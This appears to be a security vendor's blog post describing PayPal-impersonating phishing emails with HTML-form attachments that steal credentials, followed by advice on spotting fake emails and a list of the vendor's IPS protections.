Phishing scams are fraudulent email messages that appear to come from legitimate enterprises such as your university, your Internet service provider, or your bank. These messages usually direct you to a spoofed website, have a malicious attachment, or otherwise get you to divulge private information. The perpetrators then use this information to commit identity theft.
Why is PayPal fraud so special?
According to “OpenPhish”, a zero-day phishing site feed, PayPal is one of the top 10 targeted brands https://openphish.com/phishing_activity.html. PayPal is very popular and contains sensitive user information, which makes it very attractive for phishing attacks and credential theft by hackers and scammers.
[OpenPhish.com Top 10 targeted brands, 22.8.2016]
This PayPal site educates customers on how to recognize scams and deal with suspicious activity.
[Official PayPal’s suspicious activity tips site]
PayPal shares some helpful tips on how to spot a fake email:
[Some helpful tips on how to spot a fake email]
A real email from PayPal never includes attachments. If you receive an email allegedly from PayPal that includes an attachment, an attack is underway and the file is definitely malicious.
Recently, a Check Point customer received a significant number of “PayPal” emails that contained an attachment. Here is an example:
[Original email sent to a Check Point customer]
The attached file (SHA1 b74e320aaeee9de20d74251d6ad0fbf9c9c7f2df) is an html form which is opened locally.
[Html form b74e320aaeee9de20d74251d6ad0fbf9c9c7f2df]
This delivery method prevents the file from being blocked by browser plugins and IDS systems. Running Threat Emulation on this sample reveals quite easily that this is a phishing attempt to steal credentials.
[The traffic is directed to the attacker’s site.]
The attacker uses the original PayPal icon and pictures taken from the PayPal Logo Center:
Source sender Geo distribution
Despite the obvious similarity between all samples, the attacker sent the emails from several different IP addresses and countries:
These emails are indicators of compromise:
- Never open an attachment unless you are absolutely sure it’s legitimate.
- Always check the name of the sender and attachment.
- Before you enter your credentials, make sure this is an HTTPS site. Most phishing attempts use http protocol.
- Never enter or share your credentials unless you are certain the form and site are legitimate.
- Take extra care when you receive email that contains “buzz words” such as prize and urgent, or typos such as “flnd” instead of “find.”
- Remember this post’s moto: “PayPal Will Never Send You an Attachment”!
Check Point Protections
- Check Point IPS blade provides protection against this threat with these IPS protections:
- PayPal Mail Phishing Containing Attachment
- Phishing URL Attack Attempt